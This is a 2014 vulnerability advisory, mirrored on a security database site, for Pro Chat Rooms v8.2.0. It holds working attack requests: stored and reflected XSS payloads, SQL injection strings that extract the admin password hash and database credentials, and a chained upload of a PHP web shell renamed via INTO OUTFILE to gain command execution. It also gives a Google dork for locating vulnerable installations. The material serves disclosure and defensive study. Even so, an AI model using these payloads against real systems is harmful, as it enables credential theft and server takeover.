Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:31065
HistoryAug 26, 2014 - 12:00 a.m.

Pro Chat Rooms v8.2.0 - Multiple Vulnerabilities

2014-08-2600:00:00
vulners.com
78
JSON

Exploit Title: Pro Chat Rooms v8.2.0 - Multiple Vulnerabilities

Google Dork: intitle:"Powered by Pro Chat Rooms"

Date: 5 August 2014

Exploit Author: Mike Manzotti @ Dionach Ltd

Vendor Homepage: http://prochatrooms.com

Software Link: http://prochatrooms.com/software.php

Version: v8.2.0

Tested on: Debian (Apache+MySQL)

1) Stored XSS

Text Chat Room Software of ProoChatRooms is vulnerable to Stored XSS. After registered an account, an attacker can upload a profile picture containing Javascript code as shown below:

POST: http://<WEBSITE>/prochatrooms/profiles/index.php?id=1
Content-Disposition: form-data; name="uploadedfile"; filename="nopic333.jpg"
Content-Type: image/jpeg

<script>alert(document.cookie)</script>

By inspecting the response, the web application returns a 32 digits value in the HTML tag "imgID" as shown below:

Response:
<input type="hidden" name="imgID" value="798ae9b06cd900b95ed5a60e02419d4b">

The picture is uploaded under the directory "/profiles/uploads" and is accessible by force browsing to the 32 digits value as shown below:

http://<WEBSITE>/prochatrooms/profiles/uploads/798ae9b06cd900b95ed5a60e02419d4b

Image

2) Reflected XSS

Text Chat Room Software of ProoChatRooms is vulnerable to Reflected XSS. The parameter "edit" is not encoded:

http://<WEBSITE>/prochatrooms/profiles/index.php?id=1&edit="><script>alert(document.cookie)</script>

3) SQL Injection

Text Chat Room Software of ProoChatRooms is vulnerable to SQL injections. Across the all source code of web application, parameterized queries are used to query the database. However, a lack of data sanitization of three parameters leaves the web application vulnerable to SQLi. The vulnerable parameters are located as shown below:

prochatrooms_v8.2.0/includes/functions.php: ~2437
$params = array(
'password' => md5($password),
'email' => makeSafe($email),
'id' => $id
);
$query = "UPDATE prochatrooms_users
SET email = '".$email."',
password='".md5($password)."'
WHERE id = '".$id."'
";

prochatrooms_v8.2.0/includes/functions.php: ~2449
$query = "UPDATE prochatrooms_users
SET email = '".$email."'
WHERE id = '".$id."'
";

prochatrooms_v8.2.0/includes/functions.php: ~3110
$query = "UPDATE prochatrooms_users
SET active = '".$offlineTime."', online = '0'
WHERE username = '".makeSafe($toname)."'
";

Note that the β€œmakeSafe” function is defined as shown below and will protect against XSS attacks only:

prochatrooms_v8.2.0/includes/functions.php: ~125
function makeSafe($data)
{
$data = htmlspecialchars($data);

  return $data;

}

After registering an account, an attacker can exploit the SQL injection by editing the field email as shown below which will retrieve the MD5 hashed password of the administrator:

POST http://<WEBSITE>/prochatrooms/profiles/index.php?id=1
Content-Disposition: form-data; name="profileEmail"

[email protected]', email=(select adminLogin from prochatrooms_config) where id ='1';#

The following SQL injection will retrieve the SQL connection string, which probably has clear-text database credentials.

POST http://<WEBSITE>/prochatrooms/profiles/index.php?id=1
Content-Disposition: form-data; name="profileEmail"

[email protected]', email=(select load_file('/var/www/prochatrooms/includes/db.php')) where id ='1';#

4) Arbitrary File Upload

It is possible to combine the Stored XSS and SQL injection vulnerabilities to upload a web shell on the server.

The following request will upload a PHP web shell and the web application will return a 32 digit value.

POST: http://<WEBSITE>/prochatrooms/profiles/index.php?id=1
Content-Disposition: form-data; name="uploadedfile"; filename="m.jpg"
Content-Type: application/octet-stream

<?php system($_GET[cmd]);?>

Response:
<input type="hidden" name="imgID" value="82d0635538da4eac42da25f8f95f8c45">

Since the uploaded web shell is without extension it will not be executed:

http://<WEBSITE>/prochatrooms/profiles/uploads/82d0635538da4eac42da25f8f95f8c45
<?php system($_GET[cmd]);?>

Image:

However, exploiting the SQL injection it is possible to rename the file by appending a .php extension

POST http://<WEBSITE>/prochatrooms/profiles/index.php?id=1
Content-Disposition: form-data; name="profileEmail"

[email protected]' where id ='1'; SELECT load_file('/var/www/prochatrooms/profiles/uploads/82d0635538da4eac42da25f8f95f8c45') INTO OUTFILE '/var/www/prochatrooms/profiles/uploads/s.php';#

Web shell:
http://<WEBSITE>/prochatrooms/profiles/uploads/s.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Image:

Timeline

19/07/2014: Vendor informed via email
04/08/2014: Vendor informed via email
05/08/2014: Public Disclosure

Kind regards,
Mike

JSON